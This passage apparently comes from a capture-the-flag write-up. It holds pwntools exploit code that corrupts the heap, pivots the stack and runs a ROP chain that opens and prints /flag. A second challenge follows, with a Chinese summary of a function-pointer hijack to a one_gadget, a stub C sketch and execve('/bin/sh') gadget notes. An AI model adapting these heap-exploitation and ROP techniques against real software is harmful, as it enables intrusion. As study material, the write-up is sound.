edit('\x01'*0x20+p64(free_hook)*0x8+p64(heap_addr+0x10)+p64(libc_base+libc.sym["environ"])+p64(stack_addr-0x120))  # re-plant: the last entry now points at stack_addr-0x120 (author's offset)
pop_rdi = 0x00000000000215bf+libc_base  # gadget offsets are for the author's libc build
pop_rsi = 0x0000000000023eea+libc_base
pop_rdx = 0x0000000000001b96+libc_base
pop_rsp = 0x0000000000003960+libc_base
pop_rax = 0x0000000000043ae8+libc_base
syscall = 0x00000000000d2745+libc_base
push_rax = 0x000000000003e10d+libc_base  # unused below
free_hook1 = free_hook & 0xfffffffffffff000  # page that contains __free_hook, used as scratch space below
# stage 1: rax=0 is read on x86-64, so read(0, free_hook1, 0x1000), then pivot rsp to free_hook1
payload = p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(free_hook1)
payload += p64(pop_rdx)+p64(0x1000)+p64(pop_rax)+p64(0)+p64(syscall)+p64(pop_rsp)+p64(free_hook1)
add(0x78)  # per the summary this allocation returns the stack address planted above
# gdb.attach(p,"b *$rebase(0x01050)")
edit(payload+'\n')  # stage 1 written over the stack
# stage 2, delivered to stage 1's read: open(free_hook1+0x100, 0, 0) [rax=2],
# read(3, free_hook1+0x200, 0x200) [rax=0], write(1, free_hook1+0x200, 0x100) [rax=1]
payload = [
    pop_rdi,
    free_hook1+0x100,
    pop_rsi,
    0,
    pop_rdx,
    0,
    pop_rax,
    2,
    syscall,
    pop_rdi,
    3,
    pop_rsi,
    free_hook1+0x200,
    pop_rdx,
    0x200,
    pop_rax,
    0,
    syscall,
    pop_rdi,
    1,
    pop_rsi,
    free_hook1+0x200,
    pop_rdx,
    0x100,
    pop_rax,
    1,
    syscall
]
p.sendline(flat(payload).ljust(0x100,"a")+"/flag\x00\x00\x00")  # "/flag" lands at free_hook1+0x100, the path open() receives
p.interactive()
satool
该题含有堆溢出漏洞以及任意函数调用,在run函数中存在函数指针,在设置fakekey时没有检查key的大小,利用残留的libc信息和og偏移将函数指针劫持为og,再用run调用函数
#include<stdio.h>
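int B4ckDo0r(char *s1){
    /* Author's sketch of the call order used against the target (see the
     * summary above): five save()s, stealkey(), fakekey() with a negative
     * offset, then run(). Every callee is a stub below that returns 0, so
     * this file documents the sequence rather than performing it.
     * The callees are defined after this function; block-scope prototypes
     * avoid the implicit-declaration error modern C compilers raise. */
    int save(char *, char *);
    int stealkey(void);
    int fakekey(int);
    int run(void);
    (void)s1;  /* the argument is not used by the sketch */
    save("aaaa","aaaa");
    save("aaaa","aaaa");
    save("aaaa","aaaa");
    save("aaaa","aaaa");
    save("\x00","aaaa");  /* "\x00" is an empty C string: its first byte is the terminator */
    stealkey();
    fakekey(-0x2e1884);  /* negative value: per the summary fakekey() never checks the key size */
    run();  /* per the summary run() calls through a function pointer reached by the steps above */
    return 0;  /* the original fell off the end of a non-void function */
}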
/*0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
*/
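/* Stub standing in for the target's run(); always returns 0.
 * (void) gives it a real prototype so a call with arguments is diagnosed. */
int run(void){
    return 0;
}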
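/* Stub standing in for the target's save(key, value); both arguments are
 * ignored and 0 is returned. The casts silence unused-parameter warnings. */
int save(char *s1,char *s2){
    (void)s1;
    (void)s2;
    return 0;
}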
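/* Stub standing in for the target's stealkey(); always returns 0.
 * (void) gives it a real prototype so a call with arguments is diagnosed. */
int stealkey(void){
    return 0;
}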
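/* Stub standing in for the target's fakekey(size); the argument is ignored
 * and 0 is returned. The real function, per the summary, accepts the value
 * without a range check, which is what the sketch relies on. */
int fakekey(int a1){
    (void)a1;
    return 0;
}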
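/* Entry point: runs the sketch once. The explicit return keeps pre-C99
 * compilers from returning an indeterminate status. */
int main(void){
    B4ckDo0r("aaaaaaaaaaaa");
    return 0;
}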